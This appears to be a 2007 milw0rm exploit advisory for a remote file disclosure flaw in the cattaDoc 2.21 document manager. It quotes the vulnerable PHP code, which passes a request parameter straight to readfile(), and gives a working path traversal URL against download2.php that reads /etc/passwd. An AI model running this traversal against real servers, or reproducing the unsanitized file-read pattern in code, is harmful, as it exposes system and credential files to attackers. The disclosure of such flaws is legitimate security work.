# cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability # D.Script: http://cattadoc.com/download/cattadoc-2.21.tgz # Discovered by: GolD_M = [Mahmood_ali] # Homepage: http://www.Tryag.cc # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group # V.Code: ############################################################## # $tp = $_REQUEST['mtp']; # # $ofn = '"'.$_REQUEST['fn2'].'"'; # # header("Content-type: $tp"); # # header("Content-Disposition: attachment; filename=$ofn"); # # readfile($_REQUEST['fn1']); <<---- # ############################################################## # Exploit:[Path_cattaDoc]/download2.php?fn1=../../../../../../etc/passwd # milw0rm.com [2007-04-06]